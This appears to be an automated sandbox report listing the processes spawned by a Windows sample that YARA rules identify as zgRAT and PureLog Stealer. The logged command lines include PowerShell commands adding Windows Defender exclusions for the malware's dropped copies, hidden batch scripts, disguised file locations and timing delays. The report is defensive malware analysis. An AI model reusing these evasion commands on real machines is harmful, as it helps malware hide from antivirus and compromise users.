                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"
                                                                          Imagebase:0x7ff6479d0000
                                                                          File size:52'744 bytes
                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:25
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:27
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:29
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:31
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:33
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:34
                                                                          Start time:13:21:59
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:13:21:59
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Program Files\Windows Multimedia Platform\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 74%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:37
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Program Files\Windows Multimedia Platform\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                                          Imagebase:0x290000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:38
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Imagebase:0x8e0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:39
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Imagebase:0xa80000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:40
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:41
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Imagebase:0x7a0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 74%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:42
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Imagebase:0x7d0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:43
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\PING.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:ping -n 10 localhost
                                                                          Imagebase:0x7ff700f00000
                                                                          File size:22'528 bytes
                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:44
                                                                          Start time:13:22:07
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                          Imagebase:0x7ff693ab0000
                                                                          File size:496'640 bytes
                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:45
                                                                          Start time:13:22:09
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0xc40000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:47
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0xdd0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:48
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:49
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:50
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:51
                                                                          Start time:13:22:13
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                          Imagebase:0x7ff7c0e20000
                                                                          File size:108'032 bytes
                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:52
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:53
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:54
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:55
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                          Imagebase:0x7ff7c0e20000
                                                                          File size:108'032 bytes
                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:56
                                                                          Start time:13:22:18
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                                          Imagebase:0x640000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:59
                                                                          Start time:13:22:21
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0x140000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:60
                                                                          Start time:13:22:22
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:61
                                                                          Start time:13:22:22
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:10%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:4
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 6511 7ffd9bc7c681 6514 7ffd9bc7c69f 6511->6514 6512 7ffd9bc7c7e6 QueryFullProcessImageNameA 6513 7ffd9bc7c844 6512->6513 6514->6512 6514->6514

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5[_H
                                                                            • API String ID: 0-3279724263
                                                                            • Opcode ID: f0bf71e4b34b52e5b0d7f3c3f7eb265be18d7b91e3c724f00290bac32dc733cd
                                                                            • Instruction ID: 7c795bef1dbe50254617d69a086197b99864fd122e9541c3ed62703454e0c122
                                                                            • Opcode Fuzzy Hash: f0bf71e4b34b52e5b0d7f3c3f7eb265be18d7b91e3c724f00290bac32dc733cd
                                                                            • Instruction Fuzzy Hash: 44910171A19ECD4FE799DB6888697A97FE1FF9A314F4100BAD059C72E2CB782801C701

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1824088603.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID: FullImageNameProcessQuery
                                                                            • String ID:
                                                                            • API String ID: 3578328331-0
                                                                            • Opcode ID: 577562e386507305632d5df50020d07c074273ca33f9f4737fee5f31fae6fc7e
                                                                            • Instruction ID: 8c6807bfd719e7f999328ff4d36dce132107e1f5beea389b9e7209b61ae060b4
                                                                            • Opcode Fuzzy Hash: 577562e386507305632d5df50020d07c074273ca33f9f4737fee5f31fae6fc7e
                                                                            • Instruction Fuzzy Hash: D371A030619A8D8FDB69DF28C8957F937E1FB58311F00427EE84EC7292CB74A9458B81
                                                                            • API String ID:
                                                                            • Opcode ID: 616019b8a1295cc3fe4163b689778a58b272f61794b4b14fcdafff581e3d408e
                                                                            • Instruction ID: 224f1770749ee75e7f5575aa158ac5520587d18a18dcccc01f3deeca73d7585a
                                                                            • Opcode Fuzzy Hash: 616019b8a1295cc3fe4163b689778a58b272f61794b4b14fcdafff581e3d408e
                                                                            • Instruction Fuzzy Hash: BAC04C01F1DC5A47F359A614C5715BE45539B98798FD50474E06DC72CECD2D5E030287
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: 444b06883d6403d80a20305b353aa5c2b492d5e88afe7384271677b11c4a0f03
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: AEB09220D6BA0F43DA3833B10892864B050AB4D204FD202B4D419401A1A97F52958282
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: 105df88bc064afe158920e2b52b50a2a3bd25cc092415d7a1fa889fc1ff5f02b
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: C6B02200EAA80C03E330ABB088202BE32000F0C208F0B80BA802AA3083CE382A020A00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 7c69805296b747c8bb6619effc5133634486393f796e516f843f39d7a1b03565
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 8FB01204D7BC0E02E42433F50B5A06470405B4D510FD21470D41940095985F1AA40182
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: bb31b72b98842f8e3b33be80a82a97bc21048ba867448af131269b9e260de9e6
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: 98B01200D67C0F02E42433FB0C52064B0446F8C200FCB0170D42D501A1A85E12950282
                                                                            • Instruction Fuzzy Hash: E9418661B09D5D5FE7A8F7A884BABB862D2EBA8310F550175E00DC72E3DD2C6D418741
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76019caff4360dadee5389cf79b88d2f165d553b4d48208f8bb8a3d2d11e26fe
                                                                            • Instruction ID: 9f6045e1a3b392e092ce209780a75e93ed472c3a2d0737adf2dc4f4ae0c7d99a
                                                                            • Opcode Fuzzy Hash: 76019caff4360dadee5389cf79b88d2f165d553b4d48208f8bb8a3d2d11e26fe
                                                                            • Instruction Fuzzy Hash: 9A31273130D9194FDB68EB5CF88A9B97BD1EF8932131501BBE48AC7176ED11AC828781
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 79b32b8e2f1d9fcc96db80027a29a792018b8ef24b1ad503d6514c904e302ed4
                                                                            • Instruction ID: c2bba9d8d8f0caddf73da6db71bd8a6b2e20dc0989ee2d34589731c7bb369dc2
                                                                            • Opcode Fuzzy Hash: 79b32b8e2f1d9fcc96db80027a29a792018b8ef24b1ad503d6514c904e302ed4
